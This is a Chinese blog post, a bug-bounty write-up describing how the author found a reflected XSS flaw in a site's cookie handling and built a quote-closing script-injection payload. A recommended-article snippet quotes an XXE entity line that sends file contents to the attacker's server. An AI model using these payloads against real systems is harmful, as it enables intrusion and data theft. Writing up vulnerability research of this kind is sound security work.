记一次真实src漏洞挖掘笔记。

最新推荐文章于 2024-05-06 15:43:42 发布
最新推荐文章于 2024-05-06 15:43:42 发布
阅读量738 收藏 7
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63028223/article/details/125297008
版权

平时没事挖挖洞,和往常一样,挑选好,目标。

先上awvs扫一下,然后找一下真实的IP然后nmap看一下能不能找到后台登录的入口。

但是没有找到后台呢,awvs便传来了喜报。

 

xss!!好嘛,信心还是百分百。

去手测一下。

awvs扫出来的是cookie的第一个值存在xss。

构造payload,

好像可以但是,输入的结果不是我控制的参数唉。

看一下源代码。

输入的内容到了这里。

那么思路便清晰了,双引号闭合一下,试试。

 但是还没有弹窗哎。

再想办法在前边构造一个闭合,是后边的语句可以单独被浏览器执行。

payload:"<h1><h1><script>alert("xss")</script>

 

达到目的了。

 喜提中危。嘿嘿嘿

一个番茄锅
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
一次做的python笔记,简单
03-10
这是第一次在博客上面发布文章,其实也就是刚开始学python自己把自己不懂的录下来而已
数据挖掘学习笔记(一)
01-20
知识发现(KDD)是数据挖掘的一个更广泛的概念,包括了整个从数据到知识的过程。这涉及数据预处理、数据选择、数据转换、模式发现、模式评估以及最终的知识表示。KDD是一个迭代的过程,需要不断地清洗、整合和转换...
【网络安全一场完整实战SRC漏洞挖掘(超详细)全过程
最新发布
程序员若风的博客
05-06 2166
一场完整实战SRC漏洞挖掘全过程
Web渗透测试之SRC挖掘经验分享
03-30
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。把所有漏洞作为总结讲解,从理论到实战的分享,所有经验。结合漏洞挖掘的经验以及安全工作相关的经验总结漏洞原理、发现、利用,修复,姿势,防御,等多方面思路。实战方面结合以往挖掘SRC经验,把如何操作的各种方法和经验,以及挖过的漏洞,全部分享。具备web渗透测试工程师的工作水平; 能够挖掘各家SRC应急响应中心漏洞,凭借挖漏洞月收入过万
SRC漏洞挖掘经验分享(1),2024年最新一线大厂架构师都推荐的HarmonyOS鸿蒙零基础大全
2301_79988566的博客
04-13 860
利用方式不用多说了吧,可以利用伪协议读取文件或系统命令执行ENTITY % xxe SYSTEM 'http://你服务器IP/%file;'>">
一次edusrc漏洞挖掘
Cobra的博客
03-01 5359
在fofa上闲逛的时候发现这个系统,其实之前也碰到过这个系统,当时可能觉得没什么漏洞点就没有管,正好闲着没事又碰到了这个系统,然后就拿过来简单的测试了一下! 二、漏洞挖掘 1、信息收集 由于我是在fofa上发现的这个系统,所以也谈不上什么信息收集,我就直接贴了fofa搜索语法 app="校园地图服务系统" 2、漏洞挖掘 (1)主页就是一个简单的地图界面 (2)使用dirsearch浅扫一下目录吧,结果还真扫出点东西 (3)/actuator/env这不是spring...
SRC漏洞挖掘思路手法(非常详细),零基础入门到精通,收藏这一篇就够了
youmaob的博客
02-28 2354
这段时间挖掘了挺多的SRC漏洞,虽然都是一些水洞,也没有一些高级的漏洞挖掘利用手法,但是闲下来也算是总结一下,说说我对SRC漏洞挖掘的思路技巧。
一次教育src挖洞
weixin_43658354的博客
06-03 3750
一次教育src挖洞fofa搜索了一下,找到一个有sql注入的教育网站漏洞url:http://x.x.x.x:8090/login功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 fofa搜索了一下,找到一个有sql注入的教育网站
绝对干货!src漏洞挖掘经验分享
热门推荐
南迪叶先森
07-16 2万+
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! src漏洞挖掘经验分享 – 掌控安全以恒 一、公益src 公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。 在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。.
一次学会笔记的技术
06-29
看后发现自己原来笔记的方法都弱爆了,还有一个scott yang学习法,两者结合,对学习大有裨益
python数据分析与建模实现-第一次笔记
01-27
首先我们做数据分析,想要得出最科学,最真实的结论,必须要有好的数据。而实际上我们一般面对的的都是复杂,多变的数据,所以必须要有强大的数据处理能力,接下来,我从我们面临的最真实的情况,一步一步教会大家...
ediary笔记.7z
09-06
标题中的"ediary笔记.7z"表明这是一个关于笔记的应用或软件的压缩文件,可能包含ediary的安装程序或者备份数据。ediary通常是一个日应用,让用户方便地录和管理他们的日常想法、事件和备忘录。7z是一种高效...
SRC漏洞挖掘经验+技巧篇
Innocence_0的博客
09-06 344
我们经常听到漏洞这个概念,可什么是安全漏洞?想给它一个清晰完整的定义其实是非常困难的。如果你去搜索一下对于漏洞的定义,基本上会发现高大上的学术界和讲求实用的工业界各有各的说法,漏洞相关的各种角色,比如研究者、厂商、用户,对漏洞的认识也是非常不一致的。从业多年,我至今都找不到一个满意的定义,于是我自己定义一个:安全漏洞是信息系统在生命周期的各个阶段(设计、实现、
2023最新SRC漏洞挖掘快速上手攻略!
2301_77732591的博客
06-07 3603
随着网络安全的快速发展,黑客攻击的手段也越来越多样化,因此SRC漏洞挖掘作为一种新的网络安全技术,也在不断发展和完善。那么,作为一个网安小白如果想要入门SRC漏洞挖掘,需要掌握哪些知识呢?以下是本人通过多年从事网络安全工作的经验,综合网络上已有的资料,总结得出的指导SRC漏洞挖掘入门的详细介绍。1、BugcrowdBugcrowd是一个专门为企业提供漏洞检测、漏洞挖掘、漏洞修复、防御安全相关服务的平台,为各大知名企业提供安全检测服务。
SRC挖掘之简述收集
Askshhbs的博客
04-25 838
网络安全web,Kali,渗透测试相关课件,工具,资料 可以关注公众号:“掌控安全课堂” 回复:“我想学黑客”即可免费获得 对于挖掘src的小伙伴来说第一步都是对资产进行收集,对于大部分的src来说不仅可以提交漏洞还可以提交情报,那么我们这一期主要讲解对资产进行收集的方式方法,下一期再给大家介绍关于情报搜集。 如果我们要对一家陌生的SRC进行挖掘,第一步我们必须是需要知道这家企业的资产有哪些,不然 无从下手。对于已知的SRC我们直接上手对某app或者某web可以直接进行挖掘,其实这个也是因为我对其
一次挖edusrc漏洞挖掘(sql注入)
Lulzcart的博客
01-22 1906
一次挖edusrc漏洞挖掘(sql注入)
SRC挖掘思路及方法
Z987421的博客
07-03 1414
SRC挖掘思路及方法
一次SRC实战-信息泄露
YINGXXX123的博客
01-23 1070
SRC实战信息泄露。根据上下文,网站可能会将各种信息泄漏给潜在的攻击者,包括:有关其他用户的数据,例如用户名或财务信息敏感的商业或商业数据有关网站及其基础架构的技术细节泄露敏感的用户或业务数据的危险相当明显,但泄露技术信息有时可能同样严重。尽管某些信息用途有限,但它可能是暴露其他攻击面的起点,其中可能包含其他有趣的漏洞。有时,敏感信息可能会不慎泄露给仅以正常方式浏览网站的用户。但是,更常见的是,攻击者需要通过以意外或恶意的方式与网站进行交互来引发信息泄露。
笔记录分享网站论文-笔记录分享网站-java-文档-论文
02-17
笔记录分享网站论文-笔记录分享网站-java-文档-论文 论文: !!!本文档只是论文参考文档! 需要项目源码、数据库sql、开发文档、毕设咨询等,请私信联系~ ① 系统环境:Windows/Mac ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、MVC ⑤ 开发环境:IDEA、JDK、Maven、Mysql ⑥ JDK版本:JDK1.8 ⑦ Maven包:Maven3.6 ⑧ 数据库:mysql 5.7 ⑨ 服务平台:Tomcat 8.0/9.0 ⑩ 数据库工具:SQLyog/Navicat ⑪ 开发软件:eclipse/myeclipse/idea ⑫ 浏览器:谷歌浏览器/微软edge/火狐 ⑬ 技术栈:Java、Mysql、Maven、Springboot、Mybatis、Ajax、Vue等 最新计算机软件毕业设计选题大全 https://blog.csdn.net/weixin_45630258/article/details/135901374 摘 要 目 录 第1章 绪论 1.1选题动因 1.2背景与意义 第2章 相关技术介

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值